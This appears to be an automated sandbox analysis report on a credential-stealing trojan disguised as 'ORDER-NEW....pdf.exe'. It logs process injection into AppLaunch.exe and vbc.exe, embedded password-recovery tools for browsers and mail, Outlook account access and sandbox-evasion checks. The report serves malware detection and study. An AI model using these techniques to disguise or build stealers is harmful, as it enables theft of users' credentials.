Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameFm.dll& vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameReborn Stub.exe" vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameFm.dll& vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe, 00000000.00000000.709923346.0000000002C71000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameclsRP.dll, vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe, 00000000.00000000.709923346.0000000002C71000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameReborn Stub.exe" vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe, 00000000.00000000.709383685.0000000001240000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameclsRP.dll, vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe, 00000000.00000000.662259035.00000000008A6000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameORDER-NEW.exeT vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe | Binary or memory string: OriginalFilenameORDER-NEW.exeT vs ORDER-NEW....pdf.exe
Source: ORDER-NEW....pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ORDER-NEW....pdf.exe | Static PE information: Section: )xrUhX ZLIB complexity 1.00031528433
Source: ORDER-NEW....pdf.exe | Virustotal: Detection: 62%
Source: ORDER-NEW....pdf.exe | ReversingLabs: Detection: 93%
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | File read: C:\Users\user\Desktop\ORDER-NEW....pdf.exe
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\ORDER-NEW....pdf.exe "C:\Users\user\Desktop\ORDER-NEW....pdf.exe"
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmp
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmp
Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | System information queried: HandleInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | File created: C:\Users\user\AppData\Local\Temp\7e8a2afc-e75b-3dcf-f7ef-7d8629ca2b45
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@11/9@0/0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: 5.0.AppLaunch.exe.400000.2.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.AppLaunch.exe.400000.0.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.AppLaunch.exe.400000.3.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.0.AppLaunch.exe.400000.3.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.AppLaunch.exe.400000.3.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.AppLaunch.exe.400000.1.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.AppLaunch.exe.400000.2.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.AppLaunch.exe.400000.2.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.AppLaunch.exe.400000.4.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.AppLaunch.exe.400000.4.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.AppLaunch.exe.400000.4.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.2.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.2.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.2.AppLaunch.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.0.AppLaunch.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.AppLaunch.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.AppLaunch.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.0.AppLaunch.exe.400000.3.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.AppLaunch.exe.400000.3.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.AppLaunch.exe.400000.3.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.0.AppLaunch.exe.400000.1.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00417BE9 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_00417BE9
               Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
               Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00413424 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,8_2_00413424
               Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6860
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\714e5fbb-f83f-4388-95bc-ab8eaa6f89ea
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_004141E0 FindResourceW,SizeofResource,LoadResource,LockResource,8_2_004141E0
               Source: 5.0.AppLaunch.exe.400000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
               Source: 5.0.AppLaunch.exe.400000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
               Source: 5.0.AppLaunch.exe.400000.0.unpack, u206b????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
               Source: 5.0.AppLaunch.exe.400000.4.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
               Source: 5.0.AppLaunch.exe.400000.4.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
               Source: 5.0.AppLaunch.exe.400000.4.unpack, u206b????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
               Source: 5.0.AppLaunch.exe.400000.3.unpack, u206b????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
               Source: 5.0.AppLaunch.exe.400000.3.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
               Source: 5.0.AppLaunch.exe.400000.3.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
               Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
               Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
               Source: ORDER-NEW....pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
               Source: ORDER-NEW....pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: mscorlib.pdbD source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: System.pdbd source: WER450B.tmp.dmp.9.dr
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: System.Core.ni.pdbRSDSD source: WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.716135209.00000000082D2000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740801711.00000000082D2000.00000004.00000001.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER450B.tmp.dmp.9.dr
              Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER450B.tmp.dmp.9.dr
              Source: Binary string: .pdb+ source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb+ source: ORDER-NEW....pdf.exe, 00000000.00000000.716135209.00000000082D2000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740801711.00000000082D2000.00000004.00000001.sdmp
              Source: Binary string: C:\Users\user\Desktop\ORDER-NEW....pdf.PDBh source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdba source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb* source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: System.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: (P3o0C:\Windows\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp, WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: ORDER-NEW....pdf.PDB source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: C:\Users\user\Desktop\ORDER-NEW....pdf.PDB source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: System.Drawing.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000002.933041044.0000000006FAE000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp
              Source: Binary string: System.Core.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Users\user\Desktop\ORDER-NEW....pdf.PDB[ source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: System.ni.pdb source: WER450B.tmp.dmp.9.dr
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 5_2_05437504 push E801025Eh; ret 5_2_05437509
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 5_2_054374FC push E802005Eh; retf 5_2_05437501
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 5_2_054360CF push es; ret 5_2_054360D0
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 5_2_0543326C push ss; retf 5_2_0543326D
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 5_2_054332F5 push ss; retf 5_2_054332F6
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 5_2_0543F28C push 850FD83Bh; ret 5_2_0543F291
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00444975 push ecx; ret 8_2_00444985
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00444B90 push eax; ret 8_2_00444BA4
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00444B90 push eax; ret 8_2_00444BCC
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00448E74 push eax; ret 8_2_00448E81
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_0042CF44 push ebx; retf 0042h 8_2_0042CF49
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00412341 push ecx; ret 18_2_00412351
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00412360 push eax; ret 18_2_00412374
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00412360 push eax; ret 18_2_0041239C
               Source: ORDER-NEW....pdf.exe Static PE information: section name: )xrUhX
               Source: ORDER-NEW....pdf.exe Static PE information: section name:
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004443B0
               Source: initial sample Static PE information: section name: )xrUhX entropy: 7.99978046274

              Hooking and other Techniques for Hiding and Protection

               Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe File opened: C:\Users\user\Desktop\ORDER-NEW....pdf.exe:Zone.Identifier read attributes | delete
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00443A61
               Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Process information set: NOOPENFILEERRORBOX
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
               Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
               Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

               Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
               Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
